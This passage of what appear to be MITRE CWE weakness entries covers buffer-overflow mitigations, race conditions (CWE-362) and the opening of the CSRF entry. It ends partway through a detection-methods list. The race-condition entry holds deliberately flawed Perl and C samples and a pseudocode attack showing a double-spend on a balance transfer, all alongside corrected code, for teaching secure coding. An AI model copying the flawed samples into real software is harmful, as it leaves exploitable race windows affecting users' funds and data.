Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.120.10]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

+ Weakness Ordinalities
Ordinality | Description
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
Nature | Type | ID | Name | View(s) this relationship pertains to
ChildOfWeakness ClassWeakness Class20Improper Input Validation
Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004)711
ChildOfCategoryCategory726OWASP Top Ten 2004 Category A5 - Buffer Overflows
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory741CERT C Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory875CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory970SFP Secondary Cluster: Faulty Buffer Access
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness BaseWeakness Base123Write-what-where Condition
Research Concepts1000
ParentOfWeakness VariantWeakness Variant785Use of Path Manipulation Function without Maximum-sized Buffer
Development Concepts (primary)699
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base170Improper Null Termination
Research Concepts1000
CanFollowWeakness VariantWeakness Variant231Improper Handling of Extra Values
Research Concepts1000
CanFollowWeakness BaseWeakness Base242Use of Inherently Dangerous Function
Research Concepts1000
CanFollowWeakness BaseWeakness Base416Use After Free
Research Concepts1000
CanFollowWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
CanAlsoBeWeakness VariantWeakness Variant196Unsigned to Signed Conversion Error
Research Concepts1000
+ Relationship Notes

At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.

+ Affected Resources
  • Memory
+ Functional Areas
  • Memory Management
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
PLOVERUnbounded Transfer ('classic overflow')
7 Pernicious KingdomsBuffer Overflow
CLASPBuffer overflow
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
OWASP Top Ten 2004A5CWE More SpecificBuffer Overflows
CERT C Secure CodingSTR35-CDo not copy data from an unbounded source to a fixed-length array
WASC7Buffer Overflow
CERT C++ Secure CodingSTR35-CPPDo not copy data from an unbounded source to a fixed-length array
Software Fault PatternsSFP8Faulty Buffer Access
+ White Box Definitions

A weakness where the code path includes a Buffer Write Operation such that:

1. the expected size of the buffer is greater than the actual size of the buffer where expected size is equal to the sum of the size of the data item and the position in the buffer

Where Buffer Write Operation is a statement that writes a data item of a certain size into a buffer at a certain position and at a certain index

+ References
[R.120.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127. 2nd Edition. Microsoft. 2002.
[R.120.2] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 5: Buffer Overruns." Page 89. McGraw-Hill. 2010.
[R.120.3] [REF-27] Microsoft. "Using the Strsafe.h Functions". <http://msdn.microsoft.com/en-us/library/ms647466.aspx>.
[R.120.4] [REF-26] Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.zork.org/safestr/>.
[R.120.5] [REF-22] Michael Howard. "Address Space Layout Randomization in Windows Vista". <http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx>.
[R.120.6] Arjan van de Ven. "Limiting buffer overflows with ExecShield". <http://www.redhat.com/magazine/009jul05/features/execshield/>.
[R.120.7] [REF-29] "PaX". <http://en.wikipedia.org/wiki/PaX>.
[R.120.8] Jason Lam. "Top 25 Series - Rank 3 - Classic Buffer Overflow". SANS Software Security Institute. 2010-03-02. <http://software-security.sans.org/blog/2010/03/02/top-25-series-rank-3-classic-buffer-overflow/>.
[R.120.9] [REF-25] Microsoft. "Understanding DEP as a mitigation technology part 1". <http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx>.
[R.120.10] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.120.11] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 3, "Nonexecutable Stack", Page 76.. 1st Edition. Addison Wesley. 2006.
[R.120.12] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 5, "Protection Mechanisms", Page 189.. 1st Edition. Addison Wesley. 2006.
[R.120.13] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "C String Handling", Page 388.. 1st Edition. Addison Wesley. 2006.
[R.120.14] [REF-37] Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/>.
+ Content History
Submissions
Submission Date | Submitter | Organization | Source
PLOVERExternally Mined
Modifications
Modification Date | Modifier | Organization | Source
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-10CWE Content TeamMITREInternal
Changed name and description to more clearly emphasize the "classic" nature of the overflow.
2008-10-14CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes
2008-11-24CWE Content TeamMITREInternal
updated Other_Notes, Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Other_Notes, Potential_Mitigations, Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
Previous Entry Names
Change Date | Previous Entry Name
2008-10-14Unbounded Transfer ('Classic Buffer Overflow')

CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Weakness ID: 362
Abstraction: Class
Status: Draft
+ Description

Description Summary

The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.

Extended Description

This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider.

A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc.

A race condition violates these properties, which are closely related:

  • Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution.

  • Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource.

A race condition exists when an "interfering code sequence" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when that assumption fails, atomicity is violated. For example, the single "x++" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x).

The interfering code sequence could be "trusted" or "untrusted." A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C: (Sometimes)

C++: (Sometimes)

Java: (Sometimes)

Language-independent

Architectural Paradigms

Concurrent Systems Operating on Shared Resources: (Often)

+ Common Consequences
Scope | Effect
Availability

Technical Impact: DoS: resource consumption (CPU); DoS: resource consumption (memory); DoS: resource consumption (other)

When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400).

Availability

Technical Impact: DoS: crash / exit / restart; DoS: instability

When a race condition allows multiple control flows to access a resource simultaneously, it might lead the program(s) into unexpected states, possibly resulting in a crash.

Confidentiality
Integrity

Technical Impact: Read files or directories; Read application data

When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59).

+ Likelihood of Exploit

Medium

+ Detection Methods

Black Box

Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become unstable or crash. However, race conditions with very narrow timing windows would not be detectable.

White Box

Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609).

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Race conditions may be detected with a stress test that calls the software simultaneously from a large number of threads or processes, while looking for evidence of any unexpected behavior.

Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect.

Effectiveness: Moderate

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

Cost effective for partial coverage:

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Framework-based Fuzzer

Cost effective for partial coverage:

  • Fuzz Tester

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account.

(Bad Code)
Example Language: Perl 
$transfer_amount = GetTransferAmount();
$balance = GetBalanceFromDatabase();

if ($transfer_amount < 0) {
FatalError("Bad Transfer Amount");
}
$newbalance = $balance - $transfer_amount;
if (($balance - $transfer_amount) < 0) {
FatalError("Insufficient Funds");
}
SendNewBalanceToDatabase($newbalance);
NotifyUser("Transfer of $transfer_amount succeeded.");
NotifyUser("New balance: $newbalance");

A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase().

Suppose the balance is initially 100.00. An attack could be constructed as follows:

(Attack)
Example Language: PseudoCode 
The attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.
CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.
CALLER-1 makes a transfer request of 80.00.
PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00
PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().
Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.
CALLER-2 makes a transfer request of 1.00.
PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.
PROGRAM-2 determines the new balance as 99.00.
After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.
PROGRAM-2 sends a request to update the database, setting the balance to 99.00

At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database.

To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase().
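
The synchronization option can be sketched as follows, using C with POSIX threads rather than the Perl of the example, and with an in-memory balance standing in for the database calls. The entire read-compute-write sequence runs inside one critical section, so only one transfer at a time can observe and update the balance; a real application would more likely rely on a database transaction or row lock.

/* build with: cc -pthread transfer.c */
#include <pthread.h>
#include <stdio.h>

/* Stand-ins for the example's database access. */
static double account_balance = 100.00;
static pthread_mutex_t balance_lock = PTHREAD_MUTEX_INITIALIZER;

/* Returns 0 on success, -1 if the amount is bad or funds are insufficient. */
static int transfer(double amount) {
    if (amount < 0) {
        return -1;
    }
    pthread_mutex_lock(&balance_lock);      /* start of the critical section */
    int result = -1;
    if (account_balance - amount >= 0) {
        account_balance -= amount;          /* read, compute, and write happen  */
        result = 0;                         /* while no other transfer can run  */
    }
    pthread_mutex_unlock(&balance_lock);
    return result;
}

int main(void) {
    printf("transfer 80: %d\n", transfer(80.00));
    printf("transfer 1: %d\n", transfer(1.00));
    printf("balance: %.2f\n", account_balance);
    return 0;
}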

Example 2

The following function attempts to acquire a lock in order to perform operations on a shared resource.

(Bad Code)
Example Language: C
void f(pthread_mutex_t *mutex) {
pthread_mutex_lock(mutex);

/* access shared resource */

pthread_mutex_unlock(mutex);
}

However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.

In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or by reporting them to higher levels.

(Good Code)
 
int f(pthread_mutex_t *mutex) {
int result;

result = pthread_mutex_lock(mutex);
if (0 != result)
return result;

/* access shared resource */

return pthread_mutex_unlock(mutex);
}
+ Observed Examples
Reference | Description
Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time.
chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.
chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.
Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object.
Race condition during initialization triggers a buffer overflow.
Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock.
chain: race condition triggers NULL pointer dereference
Race condition in library function could cause data to be sent to the wrong process.
Race condition in file parser leads to heap corruption.
chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory.
chain: race condition for an argument value, possibly resulting in NULL dereference
chain: race condition might allow resource to be released before operating on it, leading to NULL dereference
+ Potential Mitigations

Phase: Architecture and Design

In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance.

Phase: Architecture and Design

Use thread-safe capabilities such as the data access abstraction in Spring.

Phase: Architecture and Design

Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.

Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400).

Phase: Implementation

When using multithreading and operating on shared variables, only use thread-safe functions.

Phase: Implementation

Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write.
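
For a simple shared counter, the C11 <stdatomic.h> facilities make the read-modify-write a single indivisible operation. The following is a minimal sketch, assuming a C11 compiler.

#include <stdatomic.h>
#include <stdio.h>

/* A shared counter. atomic_fetch_add performs the read, the addition, and
   the write as one indivisible operation, unlike the plain "x++" discussed
   above, which compiles to separate load, add, and store instructions. */
static atomic_int counter = 0;

void record_event(void) {
    atomic_fetch_add(&counter, 1);
}

int main(void) {
    record_event();
    record_event();
    printf("counter = %d\n", atomic_load(&counter));
    return 0;
}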

Phase: Implementation

Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412.

Phase: Implementation

Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization.
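
Where double-checked locking is being used for one-time initialization, a safer alternative is to let the threading library perform the check. The sketch below uses POSIX pthread_once(); the init_resource() and ensure_initialized() names are illustrative.

/* build with: cc -pthread init.c */
#include <pthread.h>
#include <stdio.h>

static pthread_once_t init_once = PTHREAD_ONCE_INIT;
static int resource_ready = 0;

/* Runs exactly once, no matter how many threads call ensure_initialized()
   concurrently; the library performs the necessary synchronization. */
static void init_resource(void) {
    resource_ready = 1;
    puts("resource initialized");
}

static void ensure_initialized(void) {
    pthread_once(&init_once, init_resource);
}

int main(void) {
    ensure_initialized();
    ensure_initialized();   /* second call does not re-run init_resource */
    printf("ready = %d\n", resource_ready);
    return 0;
}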

Phase: Implementation

Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop.

Phase: Implementation

Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.362.11]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

+ Relationships
Nature | Type | ID | Name | View(s) this relationship pertains to
ChildOfCategoryCategory361Time and State
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfWeakness ClassWeakness Class691Insufficient Control Flow Management
Research Concepts (primary)1000
ChildOfCategoryCategory743CERT C Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8012010 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory852CERT Java Secure Coding Section 07 - Visibility and Atomicity (VNA)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory882CERT C++ Secure Coding Section 14 - Concurrency (CON)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory988SFP Secondary Cluster: Race Condition Window
Software Fault Pattern (SFP) Clusters (primary)888
RequiredByCompound Element: CompositeCompound Element: Composite61UNIX Symbolic Link (Symlink) Following
Research Concepts1000
RequiredByCompound Element: CompositeCompound Element: Composite689Permission Race Condition During Resource Copy
Research Concepts1000
ParentOfWeakness BaseWeakness Base364Signal Handler Race Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base366Race Condition within a Thread
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base367Time-of-check Time-of-use (TOCTOU) Race Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base368Context Switching Race Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base421Race Condition During Access to Alternate Channel
Development Concepts699
Research Concepts1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
CanFollowWeakness BaseWeakness Base662Improper Synchronization
Development Concepts699
Research Concepts1000
CanAlsoBeCategoryCategory557Concurrency Issues
Research Concepts1000
+ Research Gaps

Race conditions in web applications are under-studied and probably under-reported. However, since 2008 there has been growing interest in this area.

Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check.

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
PLOVERRace Conditions
CERT C Secure CodingFIO31-CDo not simultaneously open the same file multiple times
CERT Java Secure CodingVNA03-JDo not assume that a group of calls to independently atomic methods is atomic
CERT C++ Secure CodingFIO31-CPPDo not simultaneously open the same file multiple times
CERT C++ Secure CodingCON02-CPPUse lock classes for mutex management
+ References
[R.362.1] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 13: Race Conditions." Page 205. McGraw-Hill. 2010.
[R.362.2] Andrei Alexandrescu. "volatile - Multithreaded Programmer's Best Friend". Dr. Dobb's. 2008-02-01. <http://www.ddj.com/cpp/184403766>.
[R.362.3] Steven Devijver. "Thread-safe webapps using Spring". <http://www.javalobby.org/articles/thread-safe/index.jsp>.
[R.362.4] David Wheeler. "Prevent race conditions". 2007-10-04. <http://www.ibm.com/developerworks/library/l-sprace.html>.
[R.362.5] Matt Bishop. "Race Conditions, Files, and Security Flaws; or the Tortoise and the Hare Redux". September 1995. <http://www.cs.ucdavis.edu/research/tech-reports/1995/CSE-95-9.pdf>.
[R.362.6] David Wheeler. "Secure Programming for Linux and Unix HOWTO". 2003-03-03. <http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/avoid-race.html>.
[R.362.7] Blake Watts. "Discovering and Exploiting Named Pipe Security Flaws for Fun and Profit". April 2002. <http://www.blakewatts.com/namedpipepaper.html>.
[R.362.8] Roberto Paleari, Davide Marrone, Danilo Bruschi and Mattia Monga. "On Race Vulnerabilities in Web Applications". <http://security.dico.unimi.it/~roberto/pubs/dimva08-web.pdf>.
[R.362.9] "Avoiding Race Conditions and Insecure File Operations". Apple Developer Connection. <http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/RaceConditions.html>.
[R.362.10] Johannes Ullrich. "Top 25 Series - Rank 25 - Race Conditions". SANS Software Security Institute. 2010-03-26. <http://blogs.sans.org/appsecstreetfighter/2010/03/26/top-25-series-rank-25-race-conditions/>.
[R.362.11] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
+ Maintenance Notes

The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention.

+ Content History
Submissions
Submission Date | Submitter | Organization | Source
PLOVERExternally Mined
Contributions
Contribution Date | Contributor | Organization | Source
2010-04-30Martin SeborCisco Systems, Inc. Content
Provided Demonstrative Example
Modifications
Modification Date | Modifier | Organization | Source
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Relationships
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, References, Relationships
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Observed_Examples, Potential_Mitigations, Relationships
2010-12-13CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change Date | Previous Entry Name
2008-04-11Race Conditions
2010-12-13Race Condition

CWE-352: Cross-Site Request Forgery (CSRF)

Compound Element ID: 352
Abstraction: Variant
Structure: Composite
Status: Draft
+ Description

Description Summary

The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Extended Description

When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.

+ Alternate Terms
Session Riding
Cross Site Reference Forgery
XSRF
+ Time of Introduction
  • Architecture and Design
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server

+ Common Consequences
Scope | Effect
Confidentiality
Integrity
Availability
Non-Repudiation
Access Control

Technical Impact: Gain privileges / assume identity; Bypass protection mechanism; Read application data; Modify application data; DoS: crash / exit / restart

The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product's users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim's privileges.

+ Likelihood of Exploit

Medium to High

+ Detection Methods

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention.

Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis.

Effectiveness: High

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

Automated Static Analysis

CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link.

Effectiveness: Limited

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR Partial

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Web Application Scanner

